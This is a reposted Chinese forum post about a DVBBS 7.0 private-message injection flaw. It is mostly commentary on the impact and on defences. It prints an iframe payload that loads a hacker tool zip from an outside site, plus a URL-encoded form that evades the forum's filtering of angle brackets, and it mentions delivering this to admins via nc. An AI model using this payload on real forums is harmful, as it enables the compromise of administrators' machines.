发新话题
打印

[转载]dvbbs动网7.0+Access+sp2最新漏洞之我见

[转载]dvbbs动网7.0+Access+sp2最新漏洞之我见

文章来自:酷客天堂

刚才在黑基看到一篇名为“动网7.0+Access+sp2 最新漏洞”的文章,讲解了利用动网的messanger.asp对数据过滤不严谨(其实我倒也没觉得不严谨,不是国军无能,是共党太狡猾了!),构造恶意代码给指定的用户,在用户回复该消息是执行攻击者构造的恶意代码。除了技术因素,还包括了部分社会工程学的东东。
   原漏洞介绍:http://hackbase.com/hacker/leak/200410117823.htm,这个图看着确实比较不爽,不过还是看原始介绍来的比较快。
   我没有再去看源程序,也不想再分析利用的过程,只是听说有很多站长在听说动网出漏洞后,就把站关了。这倒是个好习惯,呵呵!都被动网整怕了,不过这也说明了动网用的比较多。我在我的论坛大概测试了一下


<iframe src=http://www.coolersky.com/Download/Hacker/Burgle/Seekey3.0.zip></iframe>coolersky
转换后:
%33%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%63%6F%6F%6C%65%72%73%6B%79%2E%63%6F%6D%2F%44%6F%77%6E%6C%6F%61%64%2F%48%61%63%6B%65%72%2F%42%75%72%67%6C%65%2F%53%65%65%6B%65%79%33%2E%30%2E%7A%69%70%3E%3C%2F%69%66%72%61%6D%65%3E%63%6F%6F%6C%65%72%73%6B%79%





   相当于跳过了页面对<>的过滤,构造了恶意代码。再设置几个相关内容,nc给站长。
   当站长打开消息,并回复的时候,会执行构造的代码。
   既然过程是这样,那么我们分析一下他的危害:
   1、首先可以明确的一点,这个漏洞应该对服务器影响不大!除非站长是在服务器上回复恶意短消息。
   2、利用该漏洞,可以构造一些特别的代码,可能会对站长使用的机器构成比较大的威胁。
   关于防范:
   1、等动网出补丁。
   2、站长不要回复任何短消息。管他是通过工具还是nc上来的,管他的标题是什么!如果是用黑基提供的工具,标题应该是“你好哦~”!
   3、对新用户登录后锁定时间加长?!
   4、站长对自己使用的机器做好安全设置。
   应该可以了吧!不足之处大家补充,千万别骂!要不以后不敢写东西了!:)


编者:阿酷先生,报告你个不幸的消息,黑基公布的工具作者看了你这篇文章,为了要你说的不准,赶紧把工具小改了一下:)

你说, 他不是没事找练呢吗
qq310926是我唯一用号,除此之外有其他号码号自称邪八冰血封情,则非本人。

TOP

发新话题